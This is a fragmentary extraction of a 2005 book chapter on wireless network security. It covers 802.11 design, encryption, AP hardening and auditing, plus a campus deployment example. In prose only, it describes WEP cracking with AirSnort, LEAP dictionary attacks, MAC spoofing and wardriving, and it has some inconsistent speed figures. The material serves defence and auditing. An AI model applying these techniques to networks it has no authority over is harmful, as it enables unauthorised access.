Professional Documents
Culture Documents
Presented by:
Inside Network
Perimeter Security
Second Edition
Sams Publishing, 800 East 96th Street, Indianapolis, Indiana 46240 USA
Reproduced from the book Inside Network Perimeter Security, 2nd Edition. Copyright 2005, Sams
Publishing. Reproduced by permission of Pearson Education, Inc., 800 East 96th Street, Indianapolis, IN
46240. Written permission from Pearson Education, Inc. is required for all other uses.
18 7376 ch14 2/11/05 2:17 PM Page 353
14
Wireless Network Security
W IRELESS 802.11 NETWORKS ARE BECOMING MORE and more popular as a means to
augment traditional wire-based LANs within companies.The pervasive nature of wireless
communications forces a security perimeter designer to reexamine some of the under-
lying principles of traditional network architectures. In a wireless world, we can no
longer assume that physical infrastructure (walls, doors, guards, and so on) will reliably
protect the network against unauthorized external access on Layer 2 (media access) and
Layer 1 (physical).To access wireless resources, the attacker only has to be in the proxim-
ity of the wireless network, often without even having to enter the building of the
potential victim. In this chapter we will briefly examine the fundamental 802.11 wireless
technologies, go over popular wireless network encryption protocols and important
techniques used to secure wireless networks from attack, look at tools and methods used
to audit our secure wireless infrastructure, and then finally review an example of a secure
wireless deployment.
802.11 Fundamentals
802.11 is a family of specifications adopted by the Institute of Electrical and Electronics
Engineers (IEEE) for implementing wireless LANs. 802.11 is similar to the IEEE 802.3
Ethernet standard in that it maps to Layer 2 and Layer 1 protocols and services.1 With
Ethernet CSMA/CD technology, wireless nodes address each other using MAC address-
es, which are embedded into the compatible network cards. However, 802.11 does not
rely on wires for carrying signals on Layer 1.This means that 802.11-compliant nodes
can wirelessly communicate with each other within a range defined by the specifications
and supported by their wireless equipment. Because the wireless aspect of communica-
tions is limited to the media access and physical layers, higher-level protocols such as IP,
TCP, and UDP do not need to be aware that datagrams are transported without wires.
802.11 networks that are most frequently deployed within companies require the
use of one or more access points (APs). An AP is a device that facilitates wireless
18 7376 ch14 2/11/05 2:17 PM Page 354
communications between 802.11 nodes and bridges the organization’s wireless and wired
networks. In this configuration, known as infrastructure mode, wireless nodes must go
through the AP when communicating with each other and with nodes on the wired
network. Alternatively, wireless networks can be deployed using an ad hoc topology, in
which case participating 802.11 nodes communicate directly with each other on a peer-
to-peer basis.2
Three main types of 802.11 networks are in use today:
n 802.11b—This was the first standard to really catch on for wireless networking. It
runs at 11Mbps, uses a wireless frequency of 2.4GHz, and has a range of up to 300
feet. It is also the most common 802.11 network type. A need for transfer speeds
greater than 11Mbps created demand for 802.11a equipment.
n 802.11a—802.11a network components run at an improved bandwidth of
56Mbps and use a broadened frequency range of 5GHz, which causes fewer con-
flicts with typical appliances such as cordless phones and microwaves.The 802.11a
specification allows for up to 12 simultaneous communication channels, as opposed
to the three channels of the 2.4GHz standards, thus equaling support of a greater
number of stations per wireless network. However, because it uses a different fre-
quency range, 802.11a offers no built-in compatibility with already deployed
802.11b equipment. Also, 802.11a equipment is much pricier and has a decreased
range over its 2.4GHz counterparts (about 50 feet at the full 54Mbps).
n 802.11g—Many people have waited to fulfill their wireless bandwidth require-
ments with the 802.11g standard.With a speed of 56Mbps and using the 2.4GHz
frequency range, 802.11g equipment is backward compatible with the more popu-
lar 802.11b standard and offers a similar distance range of up to 300 feet, allowing
full 54Mbps speeds at as far as about 100 feet. 802.11g equipment offers the speed
of 802.11a, at a more competitive price and with backward compatibility with
802.11b, making for a much easier and inexpensive upgrade path.
Network Design
The most important aspects to securing a wireless network are the way it is designed and
the way it interfaces to your wired network. No matter what features you use to secure
your wireless infrastructure, there will always be ways to defeat them. By utilizing a solid
network design strategy, you can make it harder for attackers to reach your wireless net-
work.This can also add more controls to your wireless segments and protect your wired
network from its wireless counterparts. In this section we will examine the use of fire-
walls and routers to exact the same kind of controls on wireless networks that you can
on wired networks and to prevent signal leakage through proper AP placement and
wireless signal dampening.
Production
Network
Acess Production
Point Switch
Production
Acess Network
Point
Switch
Acess
Point Firewall
Production
Acess Switch
Point
Finally, in cases where the APs themselves fall into different risk levels, it is possible to
separate each of them into its own security zone, on a multileg firewall or multiple inter-
face router (see Figure 14.3) .
A design like the one pictured in Figure 14.3 may be useful in environments such as
college campuses, where instructors and students might have very different rights to pro-
duction resources.
As enterprise class APs are developed, more and more of the same important security
features incorporated into wired network switches are being integrated into APs. Access
points have been produced that support the configuration of Quality of Service (QoS)
and VLANs on the AP itself! This way, the AP can help control the QoS considerations
18 7376 ch14 2/11/05 2:17 PM Page 357
for connected wireless clients and can group the traffic into security zones with different
levels of risk using VLAN technologies.This is a major improvement over past APs,
which basically acted like “dumb hubs.”With a multi-VLAN AP, an important design
consideration is how it will be integrated into your wired network.The connection
between it and your production switch will most likely be an 802.1q trunk, which can
propagate the same poor design considerations as demonstrated in the example in Figure
14.1. Placement of a firewall that supports 802.1q trunking between the AP and the
switch would be recommended for exacting Layer 3+ controls on your wired networks.
At the minimum, Layer 3 controls can be forced by configuring unique VLANs to sup-
port the wireless networks on the attached wired switches, forcing wireless traffic to go
through a Layer 3 device for access to the rest of the wired network (see Figure 14.4).
For more information on the separation of the network into security zones and the use
of trunking, refer to Chapter 13.
Production
Acess Network
Point
Acess Firewall
Point
Production
Switch
Acess
Point
Figure 14.3 By segmenting the APs into their own security zones,
we protect our wireless resources from each other.
Note
You can find information on trunking, the Cisco Firewall Services Module (FWSM), and the Check Point VSX
in Chapter 13.
No matter which of these wireless network designs suits your business needs best, an
important point to take away from this section is that adding Layer 3+ controls at the
edge of your wireless network provides the type of control you take for granted between
your wired network security zones.
18 7376 ch14 2/11/05 2:17 PM Page 358
Vlan 11
802.1q Trunk
VLANs 10-12
Multi-VLAN Production
AP Switch
Vlan 12
wireless DoS, though commercial packages to track down wireless transmitters (and
more) are now available, such as Airmagnet (www.airmagnet.com).
The main defense against wireless denial of service (short of triangulating the source
and tracking it down) is again the use of solid design fundamentals, such as those we
have discussed in the last two sections. Being able to segregate the DoS away from your
production network via a firewall or other control devices is ideal. QoS controls can also
be implemented at the edge of the wireless DMZ. Network intrusion detection sensors
can be placed at the point where your wireless and wired networks join. Finally, all the
means used to keep signal leakage in can also help keep the wireless DoS out.Though
no foolproof method of defense is available for wireless DoS, a proper design can go a
long way toward threat mitigation.
Wireless Encryption
Although wired Ethernet-based networks do not incorporate encryption at the media
access and physical layers, 802.11 designers developed specifications for encryption
mechanisms to allow authentication and encryption of communications between wireless
nodes on Layers 1 and 2.Wireless encryption is meant to guard against eavesdropping
and limit access to the wireless infrastructure, thus protecting against the inherently
“public” nature of wireless communications that allows them to pass through walls and
other physical barriers.4 An attacker is much more likely to gain access to the wireless
network if the organization has not enabled an encryption method or related access-
control mechanisms in its 802.11 deployment. An inexpensive reconnaissance experi-
ment in 2001 by security enthusiasts in the Boston area detected hundreds of 802.11
access points, only 44% of which had encryption enabled.5 Remember that any encryp-
tion is better than no encryption. Many wireless attackers are simply looking for a
jumping-off point from which they can launch further attacks. If an attacker finds a net-
work with poor encryption and one with no encryption, it is very likely he will attack
the network with no encryption. After all, why bother going through all the work to
crack weak encryption when he can immediately access the unprotected network?
The paper “Weaknesses in the Key Scheduling Algorithm of RC4,” by Scott Fluhrer,
Itsik Mantin, and Adi Shamir, discuss flaws with RC4 in great detail, including issues
with the way RC4 is implemented in WEP.The authors state that “when the same secret
part of the key is used with numerous different exposed values, an attacker can rederive
the secret part by analyzing the initial word of the keystreams with relatively little
work.”6 In turn, countless programs have been developed to exploit this weakness in
WEP, including WEPCrack and AirSnort, both of which will be covered later in this
chapter. For more information on the vulnerabilities of WEP and RC4, check out
“Weaknesses in the Key Scheduling Algorithm of RC4,” which is available all over the
Internet.
Note
The fact that some implementations of RC4 are weak does not mean that RC4 itself is broken. Properly
implemented, RC4 is considered secure. For more information, checkout “RSA Security Response to
Weaknesses in Key Scheduling Algorithm of RC4” at http://www.rsasecurity.com/rsalabs/node.asp?id=2009.
Despite the inherent weaknesses in WEP, it is still deployed today. If WEP is your only
choice, it is better than no encryption at all. However, you should consider WEP to be
broken and should replace it if at all possible.7 Some vendors have strengthened WEP by
incorporating an authentication protocol such as LEAP into their products.
Though these benefits help negate all the exploitable negatives with WEP deployments,
there has still been a lot of talk recently about the security of LEAP. At DEFCON in
August of 2003, Joshua Wright revealed weaknesses in LEAP to dictionary attacks.8 This
is due to limitations that can be found in the MS-CHAP implementation, including the
facts that user credentials travel in the clear (immediately giving up half of what an
attacker needs) and that its hashes do not use salts.
What Is a Salt?
A salt is a random piece of information that is added to data before it is hashed, preventing two identical
pieces of data from having the same hash. You can determine the value of a password that was hashed
without a salt by using the same hashing algorithm against password guesses and comparing the resultant
hashes against the original password hash. When the hashes match, you have successfully guessed the
password!
The LEAP dictionary attack makes an excellent case for the necessity of a strong pass-
word policy.This attack only works well when the password guesses can be easily gener-
ated via a source such as a predefined password dictionary. If complex passwords are
used, this assault will not work, and it is very unlikely that a brute force attack using the
same methodology would give timely results.
Note
For more information on the LEAP dictionary attack vulnerability, check out “Weaknesses in LEAP
Challenge/Response” (http://home.jwu.edu/jwright/presentations/asleap-defcon.pdf) and “Cisco Response
to Dictionary Attacks on Cisco LEAP” (http://www.cisco.com/en/US/products/hw/wireless/ps430/
prod_bulletin09186a00801cc901.html).
TinyPEAP
Now that a known offline dictionary attack is available against the pre-shared key version of the new
industry wireless security standard WPA, implementing an authentication server to defend your wireless
environment is more important than ever. One interesting option is called TinyPEAP (www.tinypeap.com). It
embeds a simple RADIUS server into firmware that can be added to Linksys WRT54G/GS model wireless
routers. Though most likely only an ideal solution for home and small-office networks, it’s a novel idea
nonetheless! Perhaps one day all APs will come with integrated RADIUS servers.
18 7376 ch14 2/11/05 2:17 PM Page 362
EAP-TLS is the new standard for wireless authentication set forth in the newly adopted
IEEE 802.11i security standard. It is similar to the other EAP protocols we mentioned;
however, it requires digital certificates on both wireless clients and authentication servers,
demanding the implementation of Public Key Infrastructure (PKI) for digital certificate
management.This makes EAP-TLS the most secure of the EAP standards in this section
and the most costly and complicated to deploy and manage.
A proven algorithm and suitably large key (128+ bit) makes for good security.
n
Keep these points in mind when determining which technology is the best security fit
for your environment and when deploying the technology, to maximize your environ-
ment’s protection.
The wireless networking client in Windows XP will pop up a list of available networks
when a wireless host is first connecting to a network.These networks are discovered by
the SSID broadcasts sent by their access points. In the early days of wireless, many unin-
formed network practitioners thought that changing the SSID to something other than
the manufacturer’s default was a “hardening technique.” However, client scanning shows
18 7376 ch14 2/11/05 2:17 PM Page 364
all SSID broadcasts in the area.The only benefit that changing the SSID provides is the
prevention of the instant identification of the AP vendor.
Despite the ease of administration broadcasting SSIDs offers, a good way to improve
security is to disable SSID broadcasts on all wireless access points.This will help prevent
outsiders from easily discovering your access points. On the downside, this means that all
wireless clients will need to be manually configured with the SSID of the network they
are a part of.
Wardriving
Wardriving is the term for searching out wireless access points, mostly ones that have no or poor security. It
takes its name from the process “wardialing,” which hackers used in the years of dial-up connectivity and
modems. Hackers would program wardialing programs to dial up hundreds of phone numbers looking for
modems and PBXs that could be compromised. Wardriving involves a similar process by which attackers
drive around with a laptop or PDA with wireless capabilities and attempt to locate APs using detection tools
such as Netstumbler and Mini-Stumbler. These tools search for SSIDs being broadcasted from the wireless
access points. After finding APs, attackers sometimes draw symbols with chalk on the pavement near where
the APs were found. This is called warchalking. Silencing SSID broadcasts may prevent you from being a vic-
tim of wardriving. Remember, your users are not the only people trying to connect to your AP!
It is important to keep in mind that locking down SSID broadcasts, though a good secu-
rity step, does not guarantee a secure access point. Attackers with wireless sniffers can still
examine communication flows between clients and APs and determine SSID informa-
tion, even with broadcasts disabled. However, it does prevent your wireless clients from
accidentally logging in to the wrong AP, and it prevents outsiders and attackers from
accidentally logging on to yours.
However, the use of strong authentication and encryption methods goes a long way
to help mitigate the issues caused by SSID broadcasts. It does not matter that an attacker
knows your wireless network is there if there are no exploits to run against it and your
authentication methods are solid.
FakeAP
FakeAP is a Linux-based program that can thwart wardrivers by creating the appearance of thousands of APs
on AP-detection tools such as Netstumbler. Attackers won’t know which of the thousands of access points
are legitimate and which are “ghosts” generated by FakeAP. Check it out at http://www.blackalchemy.to/
project/fakeap/.
unfortunately is not entirely true. Again, this is a good step toward a strong security pos-
ture, but with the right equipment this defense can easily be bypassed. All an attacker
needs to do is use a wireless sniffer to watch communication flows between a client and
AP. Once the attacker records the MAC address of an allowed client, he can easily spoof
the MAC address in question and begin communicating with the locked-down AP. He
may need to run a DoS (or the like) against the original owner of the MAC address to
keep it from interrupting his communications, or he may need to wait for that client to
disconnect from the network.
Having to lock down the MAC addresses for all the wireless nodes in a large network
is an administrative nightmare. However, in environments where security needs to be
maximized, locking down the MAC addresses of nodes adds an additional layer of com-
plexity that an attacker needs to bypass.The more steps an attacker needs to take to
compromise your security, the more likely he is to give up.
Miscellaneous AP Hardening
Many additional steps can be taken to help lock down your wireless access point against
attacks. First and foremost, always change the default password on the AP before putting
it into production. Be sure to follow best practices for a complex password. Also, try to
lock down AP management mechanisms as much as possible.Try to disable web manage-
ment via wireless devices and lock down wired management as much as your AP will
allow. If an out-of-band management method is available for your AP, it is highly recom-
mended that you take advantage of it.
18 7376 ch14 2/11/05 2:17 PM Page 366
Many APs have the ability to bridge themselves to other APs. It is a good idea in a
single AP environment to disable this capability. In a multi-AP environment, lock down
your APs’ intercommunication by MAC address.This can be overcome, as mentioned in
the section on MAC address lockdown, but it’s still worthy of completion.
As previously eluded to, make sure that up-to-date firmware is installed on a newly
purchased AP. Also, track firmware updates that repair security vulnerabilities. Newer
firmware versions will support additional security features, more robust and cutting-edge
encryption algorithms, and new industry security standards.
Proper passwording, secured management, and up-to-date firmware are all important
parts of locking down your access point. Hardening your AP is a key in securing your
wireless network.
VPN/IPSec
When it was originally discovered that WEP was broken, many security analysts suggest-
ed implementing VPN technologies or host-to-host IPSec on wireless clients.This added
an additional layer of confidentiality and authentication between wireless hosts and desti-
nation resources. All traffic is encrypted from the client to the destination (including
across the wired network) without fear of WEP being cracked. Configuring transport
mode IPSec is easily done for all traffic between hosts or just for certain protocols. Also,
this requires an additional level of authentication for the client and server to communi-
cate. For more information on IPSec or configuring it for transport mode operation,
check out Chapter 7, “Virtual Private Networks.”
Host Defenses
Many of the host-based defenses in Chapter 10, “Host Defense Components,” are very
beneficial for the wandering wireless client.Wireless networking technologies expose our
clients at Layer 2 and below to assaults from anyone within range. Using host IDS and a
firewall on a wireless client are excellent steps to prevent airborne attacks. Both will help
you be aware of and defend against an attempted attack, whether you are connected to
your office wireless network or on the road. Also, both act as additional “sensors” for
your wireless network’s security. Hosts may pick up wireless DoS or other attacks before
they get to your wired network defenses. Strong host defenses are an important part of
keeping your wireless environment secure.
18 7376 ch14 2/11/05 2:17 PM Page 367
advisable that you wield an external antenna, similar to the ones an attacker would use,
to increase your range.The small omni-directional antennas that are integrated into most
wireless PC cards have a fraction of the range of a directional antenna such as a Yagi. A
chart of wireless coverage for an omni-directional antenna is almost spherical, whereas a
Yagi directional antenna is more like a column stretching many times the distance of the
“omni” in the direction the antenna is being pointed.
Warning
Remember that a wireless signal can be affected by interference, reflection, and outside factors. Though you
may not be able to access your network from the parking lot today, you may be able to hit it from beyond
there next week. Perform regular audits with varying equipment and tools, but don’t rely on signal control
as your sole defense mechanism.
Start by walking the perimeter of your environment with a tool such as Netstumbler
(http://www.netstumbler.com) or, even better, Kismet (http://www.kismetwireless.net),
which can find any valid access points you are using. Netstumbler is easy to load, easier
to use, and can be run on popular handheld devices (Mini-Stumbler) as well as the ever-
pervasive Windows operating systems. However, it relies on the passive reception of SSID
broadcasts to detect APs and does not look beyond them. Do not rely on Netstumbler as
your sole auditing tool because you’ll gain a false sense of security with your results.
Other programs such as Kismet are proactive and search out wireless packets to find APs
and wireless networks. Kismet, however, is currently only available for Linux. In any case,
either program may be used by an attacker looking for your network.When walking the
grounds with either tool, take note of which APs can be located from public areas,
including lobbies, restrooms, and other publicly accessible areas in your building. Finally,
take a walk through your building and pay particular attention to SSIDs you don’t rec-
ognize. A major security hole can be added to the most secure network when an end
user deploys his own access point or configures a wireless NIC to be part of its own ad
hoc environment. Believe it or not, this happens more often than you would expect. An
executive feels tethered to his desk by a network cable, so he plugs in an AP (running
without encryption, of course) and pops a wireless NIC in to his laptop.Talk about an
attacker’s dream!
Another good practice is running a sniffer capable of examining wireless traffic—such
as Airmagnet, Ethereal (http://www.ethereal.com), or the like—and examining the
information you are sending in the clear.You might be interested to find out what infor-
mation an attacker can see even when your network is properly protected by MAC
address lockdown, disabled SSID broadcasts, and strong encryption. Also confirm that the
encryption protocols running on your network are the ones you deployed. Knowing
your weaknesses is the first step in buttressing your fortress!
Auditing Encryption
Once you are confident the information being sent through the air in your environment
is all encrypted, it is a good idea to run any available cracking tools to confirm that your
18 7376 ch14 2/11/05 2:17 PM Page 369
AirSnort
AirSnort is a freeware Linux-based sniffer that intercepts and decodes WEP-encrypted packets (it has also
recently been ported to Windows XP). AirSnort can be used by promiscuously capturing wireless packets.
After approximately 100MB–1GB of wireless data has been gathered, AirSnort can “guess the encryption
password in under a second.”11 AirSnort accomplishes this by exploiting a vulnerability in the key scheduling
algorithm of RC4, discovered by Scott Fluhrer, Itsik Mantin, and Adi Shamir (as discussed in the section on
WEP encryption, earlier in this chapter).
AirSnort needs to collect wireless packets before cracking the WEP password because, according to the pro-
gram’s documentation, out of 16 million 128-bit WEP keys that wireless cards can generate, about 3,000
are considered “weak.” After the program gathers enough “weak” WEP key packets, it is able to decipher the
WEP password and decode WEP-protected packets.
Do not consider this list as exhaustive. New vulnerabilities may appear at any time, and
you need to update your auditing tools as regularly as your attackers will.
Based on these basic requirements and the secure design elements we have discussed in
this chapter, our proposed design is illustrated in Figure 14.5.
Production Admin
Network ESS
Public
ESS
802.1q Trunks
Radius Server
For Admin
Instructor Radius Server Wireless Networks
ESS For Public
Wireless Networks
The key to this design is the functionality of the Cisco Aironet 1200 series access point
that is used for the public wireless networks—that is, the Faculty, Student, and Visitor
networks.The Aironet 1200 supports multiple VLANs and a unique security policy on
each VLAN. Each of the wireless networks is deployed as its own Extended Service Set
(ESS), or basically as its own separate wireless network, with each being configured as an
independent VLAN on the Aironet.Two APs are deployed to extend the range to cover
the required service area of the campus. However, with this added coverage comes added
exposure, which is why security is paramount. Both Aironets are trunked to the central
18 7376 ch14 2/11/05 2:17 PM Page 371
650x Series switch, which has a Firewall Services Module (FWSM) installed in it.The
FWSM allows the trunked VLANs to be firewalled from each other as well as the rest of
the wired network.
From a security perspective, each of the three networks is configured differently.The
Visitor VLAN security policy is configured to support no encryption, as specified in the
network requirements. MAC address authentication is disabled because anyone should be
able to access the Visitor ESS. No authentication is required, but connections are logged
and the FWSM is configured to only allow the Visitor network access to the Internet
and certain public resources at the university.
The Student VLAN security policy is configured to support WPAv2 Enterprise and
uses a RADIUS server that is protected by the FWSM.This strong security algorithm is
critical in the campus environment to protect outside access to critical university
resources. Because the university grounds are basically an unsecured public space, an
interloper with a laptop could wander right into range without drawing any suspicion.
Therefore, a secure protection algorithm combined with strong authentication can great-
ly increase the security of the university network. Also, specific firewall rules are added
for the Student VLAN to only allow access to student resources. SSID broadcasts are
enabled because we will not be able to configure all of the students’ laptops and MAC
address authentication is disabled. RADIUS authentication will be used for student
access, which will steer the students to the correct VLAN using a special feature of the
Aironet AP that forces authenticated clients to the appropriate ESS.
The Faculty ESS VLAN security policy is also configured to support WPAv2
Enterprise and uses the same protected RADIUS server.This strong protection protocol
and authentication method is vital not to only protect the faculty resources from outside
attackers, but also to protect them from curious students who may want to take a closer
look at their grades. Again, the FWSM is used to allow only access to faculty resources
and defend the wired network from the wireless network. Broadcasts are not required in
this case, but due to the fact that we have RADIUS configured to assign clients to the
correct VLAN, we can save ourselves a lot of administrative work by keeping broadcasts
enabled. MAC address authentication will be enabled for the Faculty VLAN to add an
additional level of security.
Faculty laptops are deployed using host-hardening best practices and installed with
host-based defense components. Not only will this help protect the Faculty network
from direct wireless attacks, it will help the university be aware of events occurring on
the wireless network.
Finally, the Admin network is configured quite differently from the public wireless
network.Though in a highly secure environment wired connectivity would be strongly
suggested over wireless, sometimes business requirements force the use of inherently less-
secure solutions. In this case, the administrators are the ones making the decisions and
they want the flexibility of wireless networking in the administration area.With this in
mind, the highest level of wireless networking security must be applied to the adminis-
trators’ network.The center of the design is a single AP deployed in a carefully chosen
point in the administration office area, thus minimizing access from the outside (as
demonstrated in Figure 14.6).
18 7376 ch14 2/11/05 2:17 PM Page 372
Multi-VLAN
Acess Point
Admin
Acess Point
Multi-VLAN
Acess Point
Signal leakage will be minimized by using signal-limiting window tint on all offices.
Also, because redecorating is not allowed in the admin area, the ceilings below their
second-floor offices will be painted with signal-limiting metallic-based paint.The Admin
AP will be a different manufacturer than the public APs to help enable additional
defense in depth. However, with this decision comes additional administrative costs,
because support personnel need to be trained on more than one product type. Broadcasts
will be disabled and MAC address authentication will be configured.WPAv2 Enterprise
is enabled and a separate RADIUS server is used for authentication.
Host-hardening best practices are used and the same host-defense components are
installed on the administrators’ laptops. Also, because security is paramount in their envi-
ronment, the administrators’ laptops are configured to use transport mode AH IPSec
connectivity to critical resources they need to access, such as student grades, confidential
employee information, and business information that is not publicly available.We have
chosen AH because it has less overhead than ESP, and because we have implemented
WPAv2 using AES encryption, we are not terribly concerned about the confidentiality
being breached in the Admin network.When the traffic is unencrypted after it has left
the AP, it is subject to IDS scans and content inspection because AH is unencrypted.
However, AH adds another level of authentication that needs to be passed to gain access
to critical resources.
An additional firewall is deployed between the Admin wireless network and the pro-
duction network to control access to production wired resources.
18 7376 ch14 2/11/05 2:17 PM Page 373
References 373
This design employs many of the security options we have covered in this chapter. A
strong network design is the foundation of this plan. Despite the fact that wireless may
not be ideal for parts of this network, business requirements justify the security tradeoff.
Therefore, maximizing the security posture through the use of all means available is
paramount. Defense-in-depth methodologies are used throughout and a proven encryp-
tion algorithm enhances the network’s security. Finally, all devices are properly hardened
using best practices and the design is continually audited as a means of ongoing verifica-
tion.
Summary
Many concerns are involved in securing wireless networks. A solid network design with
proper Layer 3+ controls and controlled signal leakage are all part of an important start.
Using proper, proven encryption algorithms and authentication, disabling SSID broad-
casts, locking down MAC addresses, and hardening your access point are all vital in the
proper security of your wireless network. Employing defense in depth with host-based
security mechanisms and IPSec round out the network’s security. Auditing the design
with popular AP detection tools, wireless sniffers, and encryption-cracking tools validates
your work.
Although no one suggestion in this section is a foolproof defense for wireless security,
using the combination of these security techniques will help keep your network off the
attacker’s radar and make compromising it a much more difficult task. Because unde-
fended wireless networks are in such great number at this time, the more protected your
wireless network is, the less likely an attacker will waste his time pursuing it.The reality
of network security is that in environments that need to be highly secure, wired net-
working should be deployed. It is less expensive and easier to lock down than its wireless
counterpart. However, when business needs dictate that wireless networking is to be
used in your environment, deploying solid wireless network security methods, as covered
in this chapter, will prove invaluable to your organization.
References
1 Intelligraphics. “Introduction to IEEE 802.11.” http://www.intelligraphics.com/articles/
80211_article.html. December 2001.
2 Jim Zyren and Al Petrick. “IEEE 802.11 Tutorial.” http://www.packetnexus.com/docs/
IEEE_80211_Primer.pdf. December 2001.
3 Bob Fleck and Jordan Dimov. “Wireless Access Points and ARP Poisoning.”
http://www.cigitallabs.com/resources/papers/download/arppoison.pdf. December 2001.
4 Wireless Ethernet Compatibility Alliance. “802.11b Wired Equivalent Privacy (WEP)
Security.” February 19, 2001. http://www.wi-fi.net/pdf/Wi-FiWEPSecurity.pdf.
December 2001.
18 7376 ch14 2/11/05 2:17 PM Page 374